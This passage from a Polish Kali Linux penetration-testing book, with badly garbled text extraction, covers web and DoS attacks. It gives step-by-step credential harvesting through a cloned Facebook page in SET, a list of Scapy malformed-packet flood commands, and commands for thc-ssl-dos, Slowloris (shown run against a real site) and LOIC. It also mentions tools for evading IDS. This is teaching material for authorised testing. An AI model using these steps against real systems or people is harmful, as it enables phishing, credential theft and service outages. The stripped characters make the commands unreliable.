2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
